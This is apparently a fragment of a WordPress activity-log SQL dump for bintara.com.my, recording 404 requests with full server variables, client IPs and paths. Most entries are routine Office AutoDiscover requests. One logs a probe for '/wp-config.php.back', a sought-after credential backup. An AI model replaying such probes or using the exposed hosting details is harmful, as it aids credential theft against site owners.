s:15:\"1569583471.6346\";s:12:\"REQUEST_TIME\";s:10:\"1569583471\";}}','notice','2019-09-27 11:24:51','2019-09-27 11:24:35',35204240,35456176,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569582558.5242140293121337890625',1,0,'103.6.198.69'),(27399,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"88E090D4-C6E2-4A2F-9F9D-2A99598D6797\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZMPGBUd@CNY2wRZC1TXsAAAAJM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"51285\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZMPGBUd@CNY2wRZC1TXsAAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569918744.8367\";s:12:\"REQUEST_TIME\";s:10:\"1569918744\";}}','notice','2019-10-01 08:32:30','2019-10-01 08:32:25',35501256,37302384,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27398,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5E25752C-4D7B-47DD-ACB2-5C21BD94FA0D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZMNa4bUhCibXajp1P6GdwAAAFA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"50914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZMNa4bUhCibXajp1P6GdwAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569918315.8669\";s:12:\"REQUEST_TIME\";s:10:\"1569918315\";}}','notice','2019-10-01 08:25:21','2019-10-01 08:25:16',35504256,37307672,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27397,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp-config.php.back\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.back\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.back\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZL@N5HiT4fRdgjqkdPKLAAAAMU\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.back\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.back\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZL@N5HiT4fRdgjqkdPKLAAAAMU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"37.1.204.92\";s:11:\"REMOTE_PORT\";s:5:\"40562\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.back\";s:10:\"SCRIPT_URL\";s:19:\"/wp-config.php.back\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZL@N5HiT4fRdgjqkdPKLAAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569914424.1524\";s:12:\"REQUEST_TIME\";s:10:\"1569914424\";}}','notice','2019-10-01 07:20:26','2019-10-01 07:20:25',35189816,37000720,'https://bintara.com.my/wp-config.php.back',1,0,'37.1.204.92'),(27396,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"28AD9780-419A-4CF8-888A-36107738CC79\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZL92IrQkxzalYOH97jzhwAAAUI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"49792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZL92IrQkxzalYOH97jzhwAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569914329.2803\";s:12:\"REQUEST_TIME\";s:10:\"1569914329\";}}','notice','2019-10-01 07:18:53','2019-10-01 07:18:50',35504072,37295056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27395,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"1F68A51F-B271-4766-882D-19EEE3F90219\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZL9p4rQkxzalYOH97jzdgAAAUI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"49783\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZL9p4rQkxzalYOH97jzdgAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569914279.6025\";s:12:\"REQUEST_TIME\";s:10:\"1569914279\";}}','notice','2019-10-01 07:18:01','2019-10-01 07:18:00',35507232,37316616,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27394,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"28D16F0B-5E5C-41B5-9D9B-93CAC29E3ABE\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLyaYrQkxzalYOH97jsogAAAUg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"65237\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLyaYrQkxzalYOH97jsogAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569911401.6141\";s:12:\"REQUEST_TIME\";s:10:\"1569911401\";}}','notice','2019-10-01 06:30:06','2019-10-01 06:30:02',35502704,37303608,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27393,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.233.81.196\";s:11:\"REMOTE_PORT\";s:5:\"47493\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLZt4bUhCibXajp1P54FQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569905079.8659\";s:12:\"REQUEST_TIME\";s:10:\"1569905079\";}}','notice','2019-10-01 04:44:43','2019-10-01 04:44:40',35135904,36946360,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'185.233.81.196'),(27391,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"196.16.255.101\";s:11:\"REMOTE_PORT\";s:5:\"44600\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLMZorQkxzalYOH97jOwgAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569901670.5644\";s:12:\"REQUEST_TIME\";s:10:\"1569901670\";}}','notice','2019-10-01 03:47:52','2019-10-01 